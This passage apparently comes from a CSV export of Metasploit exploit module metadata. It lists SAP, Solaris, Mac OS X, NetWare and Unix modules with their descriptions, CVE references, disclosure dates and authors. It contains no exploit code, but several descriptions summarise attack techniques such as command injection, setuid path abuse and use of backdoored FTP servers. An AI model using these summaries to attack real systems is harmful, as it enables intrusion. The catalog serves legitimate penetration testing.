URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534, URL-http://samba.org/samba/security/CVE-2007-2447.html","jduck " 198,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb","exploit","multi/sap/sap_mgmt_con_osexec_payload","exploit/multi/sap/sap_mgmt_con_osexec_payload","SAP Management Console OSExecute Payload Execution",600,"This module executes an arbitrary payload through the SAP Management Console SOAP Interface. A valid username and password for the SAP Management Console must be provided. This module has been tested successfully on both Windows and Linux platforms running SAP Netweaver. 
In order to exploit a Linux platform, the target system must have available the wget command.","Metasploit Framework License (BSD)","f","2011-03-08 00:00:00",0,,"passive","t","URL-http://blog.c22.cc/toolsscripts/metasploit-modules/sap_mgmt_con_osexecute/","Chris John Riley, juan vazquez " 199,"2013-05-13 21:30:07","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb","exploit","multi/sap/sap_soap_rfc_sxpg_call_system_exec","exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec","SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",500,"This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP RFC Service, to execute remote commands. This module needs SAP credentials with privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested successfully on Windows 2008 64-bit and Linux 64-bit platforms.","Metasploit Framework License (BSD)","f","2013-03-26 00:00:00",0,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","nmonkee" 200,"2013-05-13 21:30:07","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb","exploit","multi/sap/sap_soap_rfc_sxpg_command_exec","exploit/multi/sap/sap_soap_rfc_sxpg_command_exec","SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",500,"This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP SOAP RFC Service, to execute remote commands. This module needs SAP credentials with privileges to use the /sap/bc/soap/rfc in order to work. 
The module has been tested successfully on Windows 2008 64-bit and Linux 64-bit platforms.","Metasploit Framework License (BSD)","f","2012-05-08 00:00:00",0,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection, URL-https://service.sap.com/sap/support/notes/1341333, URL-https://service.sap.com/sap/support/notes/1764994","nmonkee" 201,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/ssh/sshexec.rb","exploit","multi/ssh/sshexec","exploit/multi/ssh/sshexec","SSH User Code Execution",0,"This module utilizes a stager to upload a base64 encoded binary which is then decoded, chmod'ed and executed from the command shell.","Metasploit Framework License (BSD)","t","1999-01-01 00:00:00",0,,"aggressive","t","CVE-1999-0502","Brandon Knight, Spencer McIntyre" 202,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/svn/svnserve_date.rb","exploit","multi/svn/svnserve_date","exploit/multi/svn/svnserve_date","Subversion Date Svnserve",200,"This is an exploit for the Subversion date parsing overflow. This exploit is for the svnserve daemon (svn:// protocol) and will not work for Subversion over webdav (http[s]://). This exploit should never crash the daemon, and should be safe to do multi-hits. 
**WARNING** This exploit seems to (not very often, I've only seen it during testing) corrupt the subversion database, so be careful!","Metasploit Framework License (BSD)","f","2004-05-19 00:00:00",,,"aggressive","t","BID-10386, CVE-2004-0397, OSVDB-6301, URL-http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html","spoonm " 203,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb","exploit","multi/upnp/libupnp_ssdp_overflow","exploit/multi/upnp/libupnp_ssdp_overflow","Portable UPnP SDK unique_service_name() Remote Code Execution",300,"This module exploits a buffer overflow in the unique_service_name() function of libupnp's SSDP processor. The libupnp library is used across thousands of devices and is referred to as the Intel SDK for UPnP Devices or the Portable SDK for UPnP Devices. Due to size limitations on many devices, this exploit uses a separate TCP listener to stage the real payload.","Metasploit Framework License (BSD)","t","2013-01-29 00:00:00",0,,"aggressive","t","CVE-2012-5958, URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play, US-CERT-VU-922681","Alex Eubanks , Richard Harman , hdm " 204,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb","exploit","multi/wyse/hagent_untrusted_hsdata","exploit/multi/wyse/hagent_untrusted_hsdata","Wyse Rapport Hagent Fake Hserver Command Execution",600,"This module exploits the Wyse Rapport Hagent service by pretending to be a legitimate server. This process involves starting both HTTP and FTP services on the attacker side, then contacting the Hagent service of the target and indicating that an update is available. 
The target will then download the payload wrapped in an executable from the FTP service.","Metasploit Framework License (BSD)","t","2009-07-10 00:00:00",0,,"aggressive","t","CVE-2009-0695, OSVDB-55839, URL-http://snosoft.blogspot.com/, URL-http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/, URL-http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf, URL-http://www.wyse.com/serviceandsupport/support/WSB09-01.zip, US-CERT-VU-654545","kf " 205,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/netware/smb/lsass_cifs.rb","exploit","netware/smb/lsass_cifs","exploit/netware/smb/lsass_cifs","Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow",200,"This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver. Since the driver runs in the kernel space, a failed exploit attempt can cause the OS to reboot.","Metasploit Framework License (BSD)","t","2007-01-21 00:00:00",,,"aggressive","t","CVE-2005-2852, OSVDB-12790","toto" 206,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/netware/sunrpc/pkernel_callit.rb","exploit","netware/sunrpc/pkernel_callit","exploit/netware/sunrpc/pkernel_callit","NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure. PKERNEL.NLM is installed by default on all NetWare servers to support NFS. 
The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can cause the operating system to reboot.","Metasploit Framework License (BSD)","t","2009-09-30 00:00:00",,,"aggressive","t","BID-36564, OSVDB-58447, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-067/","pahtzo" 207,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/afp/loginext.rb","exploit","osx/afp/loginext","exploit/osx/afp/loginext","AppleFileServer LoginExt PathName Overflow",200,"This module exploits a stack buffer overflow in the AppleFileServer service on MacOS X. This vulnerability was originally reported by Atstake and was actually one of the few useful advisories ever published by that company. You only have one chance to exploit this bug. This particular exploit uses a stack-based return address that will only work under optimal conditions.","Metasploit Framework License (BSD)","f","2004-05-03 00:00:00",,,"aggressive","t","BID-10271, CVE-2004-0430, OSVDB-5762","hdm " 208,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/arkeia/type77.rb","exploit","osx/arkeia/type77","exploit/osx/arkeia/type77","Arkeia Backup Client Type 77 Overflow (Mac OS X)",200,"This module exploits a stack buffer overflow in the Arkeia backup client for the Mac OS X platform. This vulnerability affects all versions up to and including 5.3.3 and has been tested with Arkeia 5.3.1 on Mac OS X 10.3.5.","Metasploit Framework License (BSD)","t","2005-02-18 00:00:00",0,,"aggressive","t","BID-12594, CVE-2005-0491, OSVDB-14011, URL-http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html","hdm " 209,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/browser/mozilla_mchannel.rb","exploit","osx/browser/mozilla_mchannel","exploit/osx/browser/mozilla_mchannel","Mozilla Firefox 3.6.16 mChannel Use-After-Free",300,"This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. 
An OBJECT element, mChannel, can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.","Metasploit Framework License (BSD)","f","2011-05-10 00:00:00",0,,"passive","t","CVE-2011-0065, OSVDB-72085, URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986","Rh0, argp , regenrecht" 210,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/browser/safari_file_policy.rb","exploit","osx/browser/safari_file_policy","exploit/osx/browser/safari_file_policy","Apple Safari file:// Arbitrary Code Execution",300,"This module exploits a vulnerability found in Apple Safari on OS X platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OS X might automount), and then execute it in /Volumes/[share]. If there's some kind of bug that leaks the victim machine's current username, then it's also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. 
Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.","Metasploit Framework License (BSD)","t","2011-10-12 00:00:00",0,,"passive","t","CVE-2011-3230, URL-http://support.apple.com/kb/HT5000, URL-http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments","Aaron Sigel, sinn3r " 211,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/browser/safari_metadata_archive.rb","exploit","osx/browser/safari_metadata_archive","exploit/osx/browser/safari_metadata_archive","Safari Archive Metadata Command Execution",600,"This module exploits a vulnerability in Safari's ""Safe file"" feature, which will automatically open any file with one of the allowed extensions. This can be abused by supplying a zip file, containing a shell script, with a metafile indicating that the file should be opened by Terminal.app. This module depends on the 'zip' command-line utility.","Metasploit Framework License (BSD)","f","2006-02-21 00:00:00",0,,"passive","t","BID-16736, CVE-2006-0848, OSVDB-23510","hdm " 212,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/browser/software_update.rb","exploit","osx/browser/software_update","exploit/osx/browser/software_update","Apple OS X Software Update Command Execution",600,"This module exploits a feature in the Distribution Packages, which are used in the Apple Software Update mechanism. This feature allows for arbitrary command execution through JavaScript. This exploit provides the malicious update server. 
Requests must be redirected to this server by other means for this exploit to work.","Metasploit Framework License (BSD)","f","2007-12-17 00:00:00",0,,"passive","t","CVE-2007-5863, OSVDB-40722","Moritz Jodeit " 213,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/email/mailapp_image_exec.rb","exploit","osx/email/mailapp_image_exec","exploit/osx/email/mailapp_image_exec","Mail.app Image Attachment Command Execution",0,"This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5.","Metasploit Framework License (BSD)","f","2006-03-01 00:00:00",,,"passive","t","BID-16907, BID-26510, CVE-2006-0395, CVE-2007-6165, OSVDB-40875","hdm , kf " 214,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/ftp/webstar_ftp_user.rb","exploit","osx/ftp/webstar_ftp_user","exploit/osx/ftp/webstar_ftp_user","WebSTAR FTP Server USER Overflow",200,"This module exploits a stack buffer overflow in the logging routine of the WebSTAR FTP server. Reliable code execution is obtained by a series of hops through the System library.","Metasploit Framework License (BSD)","t","2004-07-13 00:00:00",0,,"aggressive","t","BID-10720, CVE-2004-0695, OSVDB-7794","ddz , hdm " 215,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/http/evocam_webserver.rb","exploit","osx/http/evocam_webserver","exploit/osx/http/evocam_webserver","MacOS X EvoCam HTTP GET Buffer Overflow",200,"This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier versions as well. 
EvoCam version 3.6.8 fixes the vulnerability.","Metasploit Framework License (BSD)","f","2010-06-01 00:00:00",1,,"aggressive","t","CVE-2010-2309, EDB-12835, OSVDB-65043","Paul Harrington, dookie" 216,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/local/setuid_tunnelblick.rb","exploit","osx/local/setuid_tunnelblick","exploit/osx/local/setuid_tunnelblick","Setuid Tunnelblick Privilege Escalation",600,"This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 over Mac OS X 10.7.5.","Metasploit Framework License (BSD)","f","2012-08-11 00:00:00",0,,"aggressive","t","CVE-2012-3485, EDB-20443, URL-http://blog.zx2c4.com/791","Jason A. Donenfeld, juan vazquez " 217,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/local/setuid_viscosity.rb","exploit","osx/local/setuid_viscosity","exploit/osx/local/setuid_viscosity","Viscosity setuid-set ViscosityHelper Privilege Escalation",600,"This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient validation of path names allows execution of arbitrary python code as root. This module has been tested successfully on Viscosity 1.4.1 over Mac OS X 10.7.5.","Metasploit Framework License (BSD)","f","2012-08-12 00:00:00",0,,"aggressive","t","CVE-2012-4284, EDB-20485, OSVDB-84709, URL-http://blog.zx2c4.com/791","Jason A. 
Donenfeld, juan vazquez " 218,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/mdns/upnp_location.rb","exploit","osx/mdns/upnp_location","exploit/osx/mdns/upnp_location","Mac OS X mDNSResponder UPnP Location Overflow",200,"This module exploits a buffer overflow that occurs when processing specially crafted requests set to mDNSResponder. All Mac OS X systems between version 10.4 and 10.4.9 (without the 2007-005 patch) are affected.","Metasploit Framework License (BSD)","f","2007-05-25 00:00:00",1,,"aggressive","t","BID-24144, CVE-2007-2386, OSVDB-35142, URL-http://support.apple.com/kb/TA24732","ddz " 219,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/misc/ufo_ai.rb","exploit","osx/misc/ufo_ai","exploit/osx/misc/ufo_ai","UFO: Alien Invasion IRC Client Buffer Overflow",200,"This module exploits a buffer overflow in the IRC client component of UFO: Alien Invasion 2.2.1.","Metasploit Framework License (BSD)","f","2009-10-28 00:00:00",0,,"passive","t","EDB-14013, OSVDB-65689","Jason Geffner, dookie" 220,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb","exploit","osx/rtsp/quicktime_rtsp_content_type","exploit/osx/rtsp/quicktime_rtsp_content_type","MacOS X QuickTime RTSP Content-Type Overflow",200,"No module description","Metasploit Framework License (BSD)","f","2007-11-23 00:00:00",2,,"passive","t","BID-26549, CVE-2007-6166, OSVDB-40876","unknown" 221,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/samba/lsa_transnames_heap.rb","exploit","osx/samba/lsa_transnames_heap","exploit/osx/samba/lsa_transnames_heap","Samba lsa_io_trans_names Heap Overflow",200,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon. 
This module uses the szone_free() to overwrite the size() or free() pointer in initial_malloc_zones structure.","Metasploit Framework License (BSD)","t","2007-05-14 00:00:00",,,"aggressive","t","CVE-2007-2446, OSVDB-34699","Adriano Lima , Ramon de C Valle , hdm " 222,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/samba/trans2open.rb","exploit","osx/samba/trans2open","exploit/osx/samba/trans2open","Samba trans2open Overflow (Mac OS X PPC)",500,"This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",0,,"aggressive","t","BID-7294, CVE-2003-0201, OSVDB-4469, URL-http://seclists.org/bugtraq/2003/Apr/103","hdm , jduck " 223,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/generic_exec.rb","exploit","pro/web/generic_exec","exploit/pro/web/generic_exec","Generic Web Application Unix Command Execution",600,"This module can be used to exploit any generic command execution vulnerability for CGI applications on Unix-like platforms. 
To use this module, specify the CMDURI path, replacing the command itself with !payload!.","Metasploit Framework License (BSD)","f","1993-11-14 00:00:00",0,,"aggressive","t",,"hdm , tasos" 224,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/http_put_asp.rb","exploit","pro/web/http_put_asp","exploit/pro/web/http_put_asp","HTTP PUT ASP/.NET Upload",0,,"BSD License","f","2008-10-13 00:00:00",0,,"aggressive","t",,"thelightcosine" 225,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/http_put_php.rb","exploit","pro/web/http_put_php","exploit/pro/web/http_put_php","Generic PHP Code Evaluation",0,"Exploits things like It is likely that HTTP evasion options will break this exploit.","BSD License","f","2008-10-13 00:00:00",0,,"aggressive","t",,"egypt , tasos" 226,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/php_eval.rb","exploit","pro/web/php_eval","exploit/pro/web/php_eval","Generic PHP Code Evaluation",0,"Exploits things like It is likely that HTTP evasion options will break this exploit.","BSD License","f","2008-10-13 00:00:00",0,,"aggressive","t",,"egypt , tasos" 227,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/php_include.rb","exploit","pro/web/php_include","exploit/pro/web/php_include","PHP Remote File Include Generic Code Execution",300,"This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: ","Metasploit Framework License (BSD)","f","2006-12-17 00:00:00",0,,"aggressive","t",,"egypt , ethicalhack3r, hdm , tasos" 228,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/sqli_mssql.rb","exploit","pro/web/sqli_mssql","exploit/pro/web/sqli_mssql","SQL injection exploit for MSSQL",0,,"BSD License","f","2000-05-30 00:00:00",0,,"aggressive","t",,"tasos" 229,"2013-05-30 
16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/sqli_mysql.rb","exploit","pro/web/sqli_mysql","exploit/pro/web/sqli_mysql","SQL injection exploit for MySQL",0,,"BSD License","f","2007-06-05 00:00:00",1,,"aggressive","t",,"egypt , tasos" 230,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/sqli_mysql_php.rb","exploit","pro/web/sqli_mysql_php","exploit/pro/web/sqli_mysql_php","SQL injection exploit for MySQL",0,,"BSD License","f","2000-05-30 00:00:00",0,,"aggressive","t",,"tasos" 231,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/sqli_postgres.rb","exploit","pro/web/sqli_postgres","exploit/pro/web/sqli_postgres","SQL injection exploit for PostgreSQL",0,,"BSD License","f","2007-06-05 00:00:00",1,,"aggressive","t",,"egypt , tasos" 232,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/windows/dynamic_exe.rb","exploit","pro/windows/dynamic_exe","exploit/pro/windows/dynamic_exe","PRO: Payload Dynamic EXE Generator",500,"This module takes a Windows payload and generates a dynamic EXE wrapper around it.","Metasploit Framework License (BSD)","f",,0,,"aggressive","t",,"thelightcosine" 233,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/dtspcd/heap_noir.rb","exploit","solaris/dtspcd/heap_noir","exploit/solaris/dtspcd/heap_noir","Solaris dtspcd Heap Overflow",500,"This is a port of noir's dtspcd exploit. This module should work against any vulnerable version of Solaris 8 (sparc). 
The original exploit code was published in the book Shellcoder's Handbook.","Metasploit Framework License (BSD)","t","2002-07-10 00:00:00",0,,"aggressive","t","BID-3517, CVE-2001-0803, OSVDB-4503, URL-http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip, URL-http://www.cert.org/advisories/CA-2001-31.html","hdm , noir " 234,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/lpd/sendmail_exec.rb","exploit","solaris/lpd/sendmail_exec","exploit/solaris/lpd/sendmail_exec","Solaris LPD Command Execution",600,"This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Sun Solaris up to and including 8.0. This module uses a technique discovered by Dino Dai Zovi to exploit the flaw without needing to know the resolved name of the attacking system.","Metasploit Framework License (BSD)","f","2001-08-31 00:00:00",0,,"aggressive","t","BID-3274, CVE-2001-1583, OSVDB-15131","ddz , hdm " 235,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/samba/lsa_transnames_heap.rb","exploit","solaris/samba/lsa_transnames_heap","exploit/solaris/samba/lsa_transnames_heap","Samba lsa_io_trans_names Heap Overflow",200,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additionally, this module will not work when the Samba ""log level"" parameter is higher than ""2"".","Metasploit Framework License (BSD)","t","2007-05-14 00:00:00",0,,"aggressive","t","CVE-2007-2446, OSVDB-34699","Adriano Lima , Ramon de C Valle , hdm " 236,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/samba/trans2open.rb","exploit","solaris/samba/trans2open","exploit/solaris/samba/trans2open","Samba trans2open Overflow (Solaris SPARC)",500,"This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. 
This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",0,,"aggressive","t","BID-7294, CVE-2003-0201, OSVDB-4469, URL-http://seclists.org/bugtraq/2003/Apr/103","hdm , jduck " 237,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb","exploit","solaris/sunrpc/sadmind_adm_build_path","exploit/solaris/sunrpc/sadmind_adm_build_path","Sun Solaris sadmind adm_build_path() Buffer Overflow",500,"This module exploits a buffer overflow vulnerability in adm_build_path() function of sadmind daemon. The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle-time is specified with the -i command line option. The sadmind daemon may be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run, even if there are no active requests.","Metasploit Framework License (BSD)","t","2008-10-14 00:00:00",0,,"aggressive","t","CVE-2008-4556, OSVDB-49111, URL-http://risesecurity.org/advisories/RISE-2008001.txt","Adriano Lima , Ramon de C Valle " 238,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/sunrpc/sadmind_exec.rb","exploit","solaris/sunrpc/sadmind_exec","exploit/solaris/sunrpc/sadmind_exec","Solaris sadmind Command Execution",600,"This exploit targets a weakness in the default security settings of the sadmind RPC application. 
This server is installed and enabled by default on most versions of the Solaris operating system. Vulnerable systems include Solaris 2.7, 8, and 9.","Metasploit Framework License (BSD)","t","2003-09-13 00:00:00",0,,"aggressive","t","BID-8615, CVE-2003-0722, OSVDB-4585, URL-http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html","cazz , hdm , vlad902 " 239,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/sunrpc/ypupdated_exec.rb","exploit","solaris/sunrpc/ypupdated_exec","exploit/solaris/sunrpc/ypupdated_exec","Solaris ypupdated Command Execution",600,"This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option.","Metasploit Framework License (BSD)","t","1994-12-12 00:00:00",0,,"aggressive","t","BID-1749, CVE-1999-0209, OSVDB-11517","I)ruid " 240,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/telnet/fuser.rb","exploit","solaris/telnet/fuser","exploit/solaris/telnet/fuser","Sun Solaris Telnet Remote Authentication Bypass Vulnerability",600,"This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11.","Metasploit Framework License (BSD)","f","2007-02-12 00:00:00",0,,"aggressive","t","BID-22512, CVE-2007-0882, OSVDB-31881","MC " 241,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/telnet/ttyprompt.rb","exploit","solaris/telnet/ttyprompt","exploit/solaris/telnet/ttyprompt","Solaris in.telnetd TTYPROMPT Buffer Overflow",600,"This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon.","Metasploit Framework License (BSD)","f","2002-01-18 
00:00:00",0,,"aggressive","t","BID-5531, CVE-2001-0797, OSVDB-690","MC , cazz " 242,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb","exploit","unix/ftp/proftpd_133c_backdoor","exploit/unix/ftp/proftpd_133c_backdoor","ProFTPD-1.3.3c Backdoor Command Execution",600,"This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010.","Metasploit Framework License (BSD)","t","2010-12-02 00:00:00",0,,"aggressive","t","BID-45150, OSVDB-69562, URL-http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org","MC , darkharper2" 243,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb","exploit","unix/ftp/vsftpd_234_backdoor","exploit/unix/ftp/vsftpd_234_backdoor","VSFTPD v2.3.4 Backdoor Command Execution",600,"This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.","Metasploit Framework License (BSD)","t","2011-07-03 00:00:00",0,,"aggressive","t","OSVDB-73573, URL-http://pastebin.com/AetT9sS5, URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html","MC , hdm " 244,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/http/contentkeeperweb_mimencode.rb","exploit","unix/http/contentkeeperweb_mimencode","exploit/unix/http/contentkeeperweb_mimencode","ContentKeeper Web Remote Command Execution",600,"This module exploits the ContentKeeper Web Appliance. Versions prior to 125.10 are affected. This module exploits a combination of weaknesses to enable remote command execution as the Apache user. 
By setting SkipEscalation to false, this module will attempt to setuid the bash shell.","Metasploit Framework License (BSD)","f","2009-02-25 00:00:00",0,,"aggressive","t","OSVDB-54551, OSVDB-54552, URL-http://www.aushack.com/200904-contentkeeper.txt","patrick " 245,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/http/ctek_skyrouter.rb","exploit","unix/http/ctek_skyrouter","exploit/unix/http/ctek_skyrouter","CTEK SkyRouter 4200 and 4300 Command Execution",200,"This module exploits an unauthenticated remote root command execution vulnerability in the CTEK SkyRouter 4200 and 4300.","Metasploit Framework License (BSD)","f","2011-09-08 00:00:00",0,,"aggressive","t","URL-http://dev.metasploit.com/redmine/issues/5610","savant42" 246,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/http/freepbx_callmenum.rb","exploit","unix/http/freepbx_callmenum","exploit/unix/http/freepbx_callmenum","FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",0,"This module exploits FreePBX versions 2.10.0, 2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code into the '$channel' variable in function callme_startcall in order to gain remote code execution. Please note that in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs.","Metasploit Framework License (BSD)","f","2012-03-20 00:00:00",0,,"aggressive","t","CVE-2005-2561, EDB-18649","Martin Tschirsich, muts" 247,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/http/lifesize_room.rb","exploit","unix/http/lifesize_room","exploit/unix/http/lifesize_room","LifeSize Room Command Injection",600,"This module exploits a vulnerable resource in LifeSize Room versions 3.5.3 and 4.7.18 to inject OS commands. 
